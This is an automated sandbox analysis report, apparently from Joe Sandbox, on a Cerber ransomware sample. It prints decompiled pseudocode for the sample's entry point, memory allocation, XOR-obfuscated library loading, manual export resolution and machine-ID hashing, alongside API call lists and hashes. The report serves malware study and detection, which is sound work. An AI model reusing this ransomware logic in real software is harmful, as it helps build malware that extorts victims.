Opcode Fuzzy Hash: 1b3fc643ef2366b6010b80a73a582ea71f5e7443e240881e435b80748d053974
Instruction Fuzzy Hash: 7BC04C70750252AEEF309720AD46F353779A724F01FF04631F90AEA990D2F6688D8A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004066F0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 118
synchronizationthreadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			_entry_() {
				char _v404;
				short _v684;
				void _v890;
				char _v892;
				intOrPtr _v912;
				char* _v916;
				intOrPtr _v928;
				intOrPtr _v948;
				char* _v952;
				void _v976;
				struct tagOFNA _v980;
				char _v984;
				void* __edi;
				void* __esi;
				long _t32;
				void* _t38;
				intOrPtr _t39;
				void* _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t66;

				_push(_t61);
				_v984 = 0;
				memset( &_v976, 0, 0x54);
				_v892 = 0;
				_v980 = 0x58;
				memset( &_v890, 0, 0xc8);
				_v952 =  &_v892;
				_v916 =  &_v984;
				_v948 = 0x64;
				_v928 = 0x20;
				_v912 = E004066BB;
				GetOpenFileNameW( &_v980); // executed
				if(_v984 != 0) {
					SetErrorMode(0x8007); // executed
					E00402EFB(_t53, _t54, _t61, 0,  &_v684);
					CreateMutexW(0, 0,  &_v684); // executed
					_t32 = GetLastError();
					__eflags = _t32 - 0xb7;
					if(_t32 == 0xb7) {
						L8:
						ExitProcess( *0x40fc78);
					}
					 *0x42f838 = GetModuleHandleA(0);
					GetModuleFileNameW(0, 0x42f840, 0x104);
					_t62 = E00401270();
					__eflags = _t62;
					if(_t62 == 0) {
						goto L8;
					}
					E00406C8C(_t62);
					_pop(_t56);
					_t38 = E004027DD(_t56, _t60, __eflags, _t62);
					_pop(_t57);
					__eflags = _t38;
					if(_t38 == 0) {
						goto L8;
					}
					_t39 = E00406005(_t57);
					 *0x42fa54 = _t39;
					 *0x42fa58 = _t39;
					__eflags = _t39 - 0x3000;
					if(__eflags >= 0) {
						E0040186A(_t53, _t57, _t60, _t62, __eflags, _t62);
						_pop(_t57);
					}
					 *0x40e00c(0x202,  &_v404);
					 *0x42f834 = CreateEventW(0, 1, 0, 0);
					_t66 = CreateThread(0, 0, 0x406488, 0, 0, 0);
					E00406598(_t62, _t57, _t60, _t66, __eflags);
					WaitForSingleObject(_t66, 0xffffffff);
					CloseHandle(_t66);
					CloseHandle( *0x42f834);
					E004082AB(_t53, _t57, _t60, _t62, __eflags, _t62);
					E00403085(__eflags, _t62);
					goto L8;
				}
				return 0;
			}

0x004066fd
0x00406708
0x0040670c
0x0040671b
0x00406726
0x0040672e
0x00406737
0x0040673f
0x0040674b
0x00406753
0x0040675b
0x00406763
0x0040676d
0x0040677c
0x0040678a
0x0040679a
0x004067a0
0x004067a6
0x004067ab
0x00406876
0x0040687e
0x0040687e
0x004067c3
0x004067c8
0x004067d3
0x004067d5
0x004067d7
0x00000000
0x00000000
0x004067de
0x004067e3
0x004067e5
0x004067ea
0x004067eb
0x004067ed
0x00000000
0x00000000
0x004067f3
0x004067f8
0x004067fd
0x00406802
0x00406807
0x0040680a
0x0040680f
0x0040680f
0x0040681d
0x00406838
0x00406843
0x00406847
0x0040684f
0x00406856
0x00406862
0x00406869
0x00406870
0x00000000
0x00406875
0x00406776

APIs

memset.NTDLL ref: 0040670C
memset.NTDLL ref: 0040672E
GetOpenFileNameW.COMDLG32 ref: 00406763
SetErrorMode.KERNELBASE(00008007), ref: 0040677C
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0040679A
GetLastError.KERNEL32 ref: 004067A0
GetModuleHandleA.KERNEL32(00000000), ref: 004067B2
GetModuleFileNameW.KERNEL32(00000000,0042F840,00000104), ref: 004067C8
WSAStartup.WS2_32(00000202,?), ref: 0040681D
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406828
CreateThread.KERNEL32(00000000,00000000,00406488,00000000,00000000,00000000), ref: 0040683D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040684F
CloseHandle.KERNEL32(00000000), ref: 00406856
CloseHandle.KERNEL32 ref: 00406862
ExitProcess.KERNEL32 ref: 0040687E

Strings

, xrefs: 00406753
X, xrefs: 00406726
d, xrefs: 0040674B

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CreateHandle$CloseErrorFileModuleNamememset$EventExitLastModeMutexObjectOpenProcessSingleStartupThreadWait
String ID: $X$d
API String ID: 489344662-4046183327
Opcode ID: 3828e64078428d27c5953f10f8617a0063ac8bdc38d5cb021f34b4e167a3d876
Instruction ID: 660d1c7cf976cc34eab42097ed30c14822809f0425eed3060e2e2b5ec831864e
Opcode Fuzzy Hash: 3828e64078428d27c5953f10f8617a0063ac8bdc38d5cb021f34b4e167a3d876
Instruction Fuzzy Hash: 6541AC32005310AFD320AB61ED4DE9F7BA8EF86765F00453EF045E61E0DB788549CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040533B Relevance: 6.0, APIs: 4, Instructions: 47
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040533B(void* __ecx, void* __edi, long _a4) {
				long _v8;
				void* _t22;
				void* _t27;
				void* _t29;

				_t27 = __edi;
				_t24 = __ecx;
				_push(__ecx);
				_v8 = GetLastError();
				if(E0040521D() == 0) {
					E004052DB(_t24); // executed
				}
				_t22 = 0;
				if(_t27 != 0) {
					_t2 = _t27 + 2; // 0x16
					_t29 = E004051F5(_t24, _t2);
					_t3 = _t29 + 0xc; // 0xc
					if(RtlAllocateHeap( *0x42f808, _a4, _t3) != 0) {
						_t22 = E00405329(_t16, _t29);
						if((_a4 & 0x00000008) == 0) {
							memset(_t22 + _t27, 0, _t29 - _t27);
						}
						if(_t22 != 0) {
							SetLastError(_v8);
						}
					}
				}
				return _t22;
			}

0x0040533b
0x0040533b
0x0040533e
0x00405345
0x0040534f
0x00405351
0x00405351
0x00405357
0x0040535b
0x0040535d
0x00405368
0x0040536a
0x0040537f
0x0040538c
0x0040538e
0x00405399
0x0040539e
0x004053a3
0x004053a8
0x004053a8
0x004053a3
0x004053ae
0x004053b3

APIs

GetLastError.KERNEL32(?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10), ref: 0040533F

Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D

RtlAllocateHeap.NTDLL(?,0000000C,?), ref: 00405377
memset.NTDLL ref: 00405399
SetLastError.KERNEL32(00000000,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 004053A8

Part of subcall function 004052DB: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
Part of subcall function 004052DB: HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
Part of subcall function 004052DB: GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Heap$CurrentErrorLastProcess$AllocateCreateInformationmemset
String ID:
API String ID: 3762545016-0
Opcode ID: f8a36282de33a118b0e3e3b4a1a5650a6279c3d7d066af10e21ffce48dc56cd7
Instruction ID: ce92fe84d581c274f0df690b864ad1bc2663d76769bd6b62b0cd724ef4544cd3
Opcode Fuzzy Hash: f8a36282de33a118b0e3e3b4a1a5650a6279c3d7d066af10e21ffce48dc56cd7
Instruction Fuzzy Hash: 7601A732500605ABCB206BA5DD45B9B7BACDF44388F00407EFC01F2191EBB9D9089E5C

Uniqueness

Uniqueness Score: -1.00%

Function 004052DB Relevance: 4.5, APIs: 3, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004052DB(void* __ecx) {
				char _v8;
				void* _t4;
				long _t6;

				if(E0040521D() == 0) {
					L2:
					_t4 = HeapCreate(0, 0, 0); // executed
					 *0x42f808 = _t4;
					if(_t4 != 0) {
						_v8 = 2;
						 *0x40f25c(_t4, 0,  &_v8, 4);
						_t6 = GetCurrentProcessId();
						 *0x42f80c = _t6;
						return _t6;
					}
				} else {
					_t4 = E0040528D();
					if(_t4 == 0) {
						goto L2;
					}
				}
				return _t4;
			}

0x004052e6
0x004052f1
0x004052f7
0x004052fd
0x00405304
0x0040530f
0x00405316
0x0040531c
0x00405322
0x00000000
0x00405322
0x004052e8
0x004052e8
0x004052ef
0x00000000
0x00000000
0x004052ef
0x00405328

APIs

Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D

HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C

Part of subcall function 0040528D: GetProcessHeaps.KERNEL32(000000FF,?,?,00000000), ref: 004052AC

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Process$CurrentHeap$CreateHeapsInformation
String ID:
API String ID: 3179415709-0
Opcode ID: f4d2fe047154c820b9d04e58fef47c53acbd2844d057b6373e8296822e6be4ef
Instruction ID: 23e59799b477871dd03203e7d772dc5f3eff58e84d09700a679526b41974071e
Opcode Fuzzy Hash: f4d2fe047154c820b9d04e58fef47c53acbd2844d057b6373e8296822e6be4ef
Instruction Fuzzy Hash: BEE0E574140704AADB20AF61ED06B5777A4EB05745F9040BDFA01B62E1DBB595088E6D

Uniqueness

Uniqueness Score: -1.00%

Function 04D9FF30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04D9FF9C

Strings

VirtualAlloc, xrefs: 04D9FF81, 04D9FF84

Memory Dump Source

Source File: 00000028.00000002.328304291.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_4d70000_Endermanch@Cerber5.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: f30858d0a422aae06dd199b9a003870d7df03182a4f3850dc3e6dcbbe834f4c4
Instruction ID: 435b5f1d71f39e2e4aadb5e9bc5d59e5d3afcb592c1f684256396892bf0cdb3a
Opcode Fuzzy Hash: f30858d0a422aae06dd199b9a003870d7df03182a4f3850dc3e6dcbbe834f4c4
Instruction Fuzzy Hash: 9701DE60D082CDEAEF01D7E88409BEFBFB55F15704F044098D5846B282D6BA575887B6

Uniqueness

Uniqueness Score: -1.00%

Function 04DA0480 Relevance: 2.7, APIs: 2, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04DA04C5
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 04DA05A1

Memory Dump Source

Source File: 00000028.00000002.328304291.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_4d70000_Endermanch@Cerber5.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f0fc7789056491e0bcd13214261481ad261569ee2317a91b5abc443da0f3d989
Instruction ID: dd9d1d701bab1e2349b934f70b9f889323a8617e50c6cd2475b48747b926853b
Opcode Fuzzy Hash: f0fc7789056491e0bcd13214261481ad261569ee2317a91b5abc443da0f3d989
Instruction Fuzzy Hash: DC91BAB5A00209DFDB08CF94C594EAEB7B5FF88304F248159E909AB341D775EE92CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004050BF Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004050BF(intOrPtr* _a4, signed short _a8, signed int _a12, signed int _a16) {
				char _v132;
				intOrPtr* _v136;
				signed short _v140;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr _t45;
				struct HINSTANCE__* _t53;
				void* _t57;
				signed int _t60;
				void* _t64;
				signed int _t66;
				signed short _t69;
				intOrPtr* _t81;
				signed int _t85;
				void* _t86;
				signed int _t87;

				_t81 = _a4;
				if(_t81 != 0) {
					_t64 = 0;
					__eflags =  *_t81 - 0x5a4d;
					if( *_t81 != 0x5a4d) {
						L20:
						_t38 = _t64;
						L21:
						return _t38;
					}
					_t40 =  *((intOrPtr*)(_t81 + 0x3c)) + _t81 + 4;
					_v136 = _t40;
					__eflags =  *_t40 - 0x14c;
					if( *_t40 != 0x14c) {
						goto L20;
					}
					_t85 =  *(_t40 + 0x74);
					__eflags = _t85;
					if(_t85 == 0) {
						goto L20;
					}
					_t69 = _a8;
					_t86 = _t85 + _t81;
					__eflags = _t69 >> 0x10;
					if(_t69 >> 0x10 != 0) {
						__eflags = _a12 & 0x00000001;
						if((_a12 & 0x00000001) == 0) {
							_v140 = E00404EF9(_t69, E0040507C(_t69));
						} else {
							_v140 = _t69;
						}
						_t66 = 0;
						__eflags =  *(_t86 + 0x18);
						if( *(_t86 + 0x18) <= 0) {
							goto L13;
						} else {
							while(1) {
								_t57 = E00404EF9( *((intOrPtr*)(_t81 + _t66 * 4 +  *((intOrPtr*)(_t86 + 0x20)))) + _t81, E0040507C( *((intOrPtr*)(_t81 + _t66 * 4 +  *((intOrPtr*)(_t86 + 0x20)))) + _t81));
								__eflags = _v140 - _t57;
								if(_v140 == _t57) {
									break;
								}
								_t66 = _t66 + 1;
								__eflags = _t66 -  *(_t86 + 0x18);
								if(_t66 <  *(_t86 + 0x18)) {
									continue;
								}
								goto L13;
							}
							_t60 =  *( *((intOrPtr*)(_t86 + 0x24)) + _t66 * 2 + _t81) & 0x0000ffff;
							goto L23;
						}
					} else {
						_t60 = (_t69 & 0x0000ffff) -  *((intOrPtr*)(_t86 + 0x10));
						L23:
						__eflags = _t60 - 0xffffffff;
						if(_t60 == 0xffffffff) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							__eflags = _t64 - _t86;
							if(_t64 < _t86) {
								goto L20;
							}
							_t45 = _v136;
							__eflags = _t64 -  *((intOrPtr*)(_t45 + 0x78)) + _t86;
							if(_t64 >=  *((intOrPtr*)(_t45 + 0x78)) + _t86) {
								goto L20;
							}
							__eflags = _a16;
							if(__eflags == 0) {
								goto L1;
							}
							E0040508C(_t64, __eflags,  &_v132);
							_t64 = 0;
							_t87 = E004050A5( &_v132);
							__eflags = _t87;
							if(_t87 != 0) {
								 *_t87 = 0; // executed
								_t53 = LoadLibraryExA( &_v132, 0, 0);
								__eflags = _t53;
								if(_t53 != 0) {
									__eflags = _t87 + 1;
									_t64 = E004050BF(_t53, _t87 + 1, 0, _a16);
								}
							}
							goto L20;
						}
						_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x1c)) + _t60 * 4 + _t81)) + _t81;
						goto L14;
					}
				}
				L1:
				_t38 = 0;
				goto L21;
			}

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 004051B8

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4800137a6d0576019bf18e3e223d368e835cbaabb2d3a25ea0341b9291db0bb8
Instruction ID: c6742ce8dd1339212489777c70171deb5d259b5c48844efc6f8ab68823c637eb
Opcode Fuzzy Hash: 4800137a6d0576019bf18e3e223d368e835cbaabb2d3a25ea0341b9291db0bb8
Instruction Fuzzy Hash: 5831D471A00A058FC724DE28C8C0A6B73E4FB44314F10063EE855AB2D2EB78DD44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 04DA0200 Relevance: 1.6, APIs: 1, Instructions: 77
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 04DA0258

Memory Dump Source

Source File: 00000028.00000002.328304291.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_4d70000_Endermanch@Cerber5.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a2c2d76fb87602c03bfdf45c71e65d7c2dc1016122473ecb74e563991d5f964e
Instruction ID: ac4ee4a6cd3cd1122e291ef9f1cf9d4b5f7612b9addf927d6320cf223a03580c
Opcode Fuzzy Hash: a2c2d76fb87602c03bfdf45c71e65d7c2dc1016122473ecb74e563991d5f964e
Instruction Fuzzy Hash: 2C31A875A01209DFCB09CF98C880AADB7B5FF8C314F14C299D819AB355D735AA51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00402E39 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E00402E39(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				char _v12;
				signed char _v13;
				signed char _v14;
				signed char _v15;
				signed char _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				signed short _v22;
				signed short _v24;
				char _v28;
				char _v44;
				void* __ebp;
				int _t23;
				void* _t27;
				void* _t42;

				_t42 = __ecx;
				_t41 = __ebx;
				_v8 = 0x10;
				_t23 = GetComputerNameA( &_v44,  &_v8);
				_t54 = _t23;
				if(_t23 != 0) {
					_push(_a4);
					_push( &_v44);
					_push(E00405905(0x40ced4, 5, 0x7f642c43));
					_push( &_v12);
					_t23 = E00405B59(__ebx, _t42, __edi, __esi, _t54);
					if(_t23 != 0) {
						_push(__esi);
						_t46 = _v12;
						_t27 = E0040AD86( &_v28, _v12, _t23,  &_v28); // executed
						_t56 = _t27;
						if(_t27 != 0) {
							_push(_v13 & 0x000000ff);
							_push(_v14 & 0x000000ff);
							_push(_v15 & 0x000000ff);
							_push(_v16 & 0x000000ff);
							_push(_v17 & 0x000000ff);
							_push(_v18 & 0x000000ff);
							_push(_v19 & 0x000000ff);
							_push(_v20 & 0x000000ff);
							_push(_v22 & 0x0000ffff);
							_push(_v24 & 0x0000ffff);
							_push(_v28);
							_push(E0040591C(0x40d228, 0x3c, 0x1f9ba433));
							_push(_a8);
							E00405A8E(_t41, __edi, _t46, _t56);
						}
						return E00405463(_t46);
					}
				}
				return _t23;
			}

APIs

GetComputerNameA.KERNEL32(?,00000000), ref: 00402E4E

Part of subcall function 0040AD86: CryptCreateHash.ADVAPI32(00008003,00000000,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADAB
Part of subcall function 0040AD86: CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADBF
Part of subcall function 0040AD86: CryptGetHashParam.ADVAPI32(00000000,00000002,00402F19,?,00000000,?,?,?,?,00402E97,00402F19,00000000), ref: 0040ADDD
Part of subcall function 0040AD86: CryptDestroyHash.ADVAPI32(00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADEB

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CryptHash$ComputerCreateDataDestroyNameParam
String ID:
API String ID: 1269158035-0
Opcode ID: 5e7b4764ce86ad89ed88cb807e3ddcd426acfde23c696e854036afa231912a48
Instruction ID: b50cf408ba8baf7f798fd3c54e054df88dd5bb54a10a58e4a69460bee7ee399a
Opcode Fuzzy Hash: 5e7b4764ce86ad89ed88cb807e3ddcd426acfde23c696e854036afa231912a48
Instruction Fuzzy Hash: BE110DA6C00159BDDF51A7D58D05EFFBBBC9E09205F0800A6FA90F11C2E67C9744ABB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC91 Relevance: 1.5, APIs: 1, Instructions: 48
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040AC91(intOrPtr* __edi) {
				void* _v5;
				struct HINSTANCE__* _v12;
				char _v276;
				void* _t17;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				void* _t24;
				signed char _t27;
				signed char _t28;
				signed char* _t29;
				intOrPtr* _t32;
				void* _t33;
				void* _t34;
				void* _t35;

				_t29 = __edi;
				_t28 =  *((intOrPtr*)(__edi));
				_t35 = _t34 - 0x110;
				_t24 = 0;
				_t17 = 0;
				while(1) {
					_t27 =  *(_t29 + _t17 + 1) ^ _t28;
					 *(_t33 + _t17 - 0x110) = _t27;
					if(_t27 == 0) {
						break;
					}
					_t17 = _t17 + 1;
					if(_t17 < 0x104) {
						continue;
					}
					break;
				}
				_v5 = _t24;
				_t19 = LoadLibraryExA( &_v276, _t24, _t24); // executed
				_v12 = _t19;
				if(_t19 != _t24) {
					_v5 = 1;
					if( *((intOrPtr*)(_t29 + 0x108)) > _t24) {
						while(1) {
							_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x10c)) + _t24 * 4));
							_t22 = E004050BF(_v12,  *_t32, 1,  *0x40edd0); // executed
							_t35 = _t35 + 0x10;
							 *_t32 = _t22;
							if(_t22 == 0) {
								break;
							}
							_t24 = _t24 + 1;
							if(_t24 <  *((intOrPtr*)(_t29 + 0x108))) {
								continue;
							} else {
							}
							goto L9;
						}
						_v5 = 0;
					}
				}
				L9:
				return _v5;
			}

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040ACC5

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6edc05313b60101953cfe7a05a53b77c0f54885c6c3ebef2d644a023b9ac831c
Instruction ID: 23337402054ed03b5f3c0123adcbe3b28fa92f0f123e7d1e65809f76e8499c93
Opcode Fuzzy Hash: 6edc05313b60101953cfe7a05a53b77c0f54885c6c3ebef2d644a023b9ac831c
Instruction Fuzzy Hash: 7A01DB309083496FDB119FB88CC47DABBA5FF05304F2408BAD591A3241D27655A48B95

Uniqueness

Uniqueness Score: -1.00%

Function 004066BB Relevance: 1.5, APIs: 1, Instructions: 16
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004066BB(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a16) {

				if(_a8 == 0x110) {
					 *( *(_a16 + 0x40)) = E0040AD18() & 0x000000ff; // executed
					PostMessageW(_a4, 0x111, 2, 0); // executed
				}
				return 0;
			}

0x004066c4
0x004066e2
0x004066e4
0x004066e4
0x004066ed

APIs

PostMessageW.USER32(?,00000111,00000002,00000000), ref: 004066E4

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2d58d8add38293ab42b189ebc6e52ffaf17656ce9072161d736303f85cdc37c5
Instruction ID: 58071ac7e67bca16a1a60f0a94fc769f562db5208c4ac91bb24582f556c60f10
Opcode Fuzzy Hash: 2d58d8add38293ab42b189ebc6e52ffaf17656ce9072161d736303f85cdc37c5
Instruction Fuzzy Hash: 8AD01270244304AFD704DF61D84AB6A77D1AF84709F10481DF6826A1C1D6B58414EB26

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004089AC Relevance: 58.1, APIs: 31, Strings: 2, Instructions: 366
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004089AC(signed int __edx, void* __eflags, char _a4) {
				struct HDC__* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				void* _v40;
				struct tagRECT _v56;
				void* _v60;
				void* _v64;
				struct tagRECT _v80;
				intOrPtr _v86;
				intOrPtr _v94;
				void _v96;
				int _v120;
				signed int _v122;
				short _v124;
				signed int _v128;
				void _v132;
				void _v136;
				int _v152;
				signed int _v156;
				void _v160;
				void* __edi;
				void* __esi;
				void* _t99;
				struct HDC__* _t101;
				void* _t104;
				void* _t109;
				struct HDC__* _t111;
				int _t114;
				void* _t115;
				int _t118;
				signed int _t123;
				void* _t125;
				signed int _t143;
				signed int _t144;
				signed int _t159;
				void* _t162;
				WCHAR* _t167;
				void* _t169;
				signed char _t189;
				signed char _t191;
				int _t195;
				void* _t201;
				void* _t202;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t216;
				signed int _t219;
				struct HDC__* _t221;
				int _t223;
				struct HDC__* _t230;
				void* _t236;
				long _t240;

				_t214 = __edx;
				_t99 = E00405905(0x40d738, 9, 0xf223c378);
				_t1 =  &_a4; // 0x40667b
				_t101 = E004031AF( *_t1, __eflags, _t99);
				_t221 = _t101;
				_v16 = _t221;
				_t259 = _t221;
				if(_t221 != 0) {
					_t104 = E004031AF(_t221, _t259, E00405905(0x40d76c, 0x10, 0x1f2f764e));
					_pop(_t201);
					_t101 = E00403253(_t104, _t259) | _t214;
					_t260 = _t101;
					if(_t101 != 0) {
						_push( &_v40);
						_t109 = E004031AF(_t221, _t260, E00405905(0x40d514, 4, 0x22a8cdeb));
						_t202 = _t201;
						_t101 = E004078F0(E004032B8(_t109, _t260), _t202, _t214);
						_v28 = _t101;
						if(_t101 != 0) {
							_t101 = GetDC(0);
							_t230 = _t101;
							_v36 = _t230;
							if(_t230 != 0) {
								_t111 = CreateCompatibleDC(_t230);
								_v12 = _t111;
								if(_t111 == 0) {
									L20:
									return ReleaseDC(0, _t230);
								}
								_t223 = GetDeviceCaps(_t230, 8);
								_t114 = GetDeviceCaps(_t230, 0xa);
								_v24 = _t114;
								_t115 = CreateCompatibleBitmap(_t230, _t223, _t114);
								_v32 = _t115;
								_t264 = _t115;
								if(_t115 == 0) {
									L19:
									_t98 =  &_v12; // 0x40667b
									DeleteDC( *_t98);
									goto L20;
								}
								_t9 =  &_v12; // 0x40667b
								_v40 = SelectObject( *_t9, _t115);
								_t118 = GetDeviceCaps(_t230, 0x5a);
								_t123 = MulDiv(E00403253(E004031AF(_v16, _t264, E00405905( &E0040D744, 4, 0x149d4cf6)), _t264), _t118, 0x48);
								_t125 = CreateFontW( ~_t123, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, E0040591C(0x40d74c, 8, 0xaf2a2560));
								_v64 = _t125;
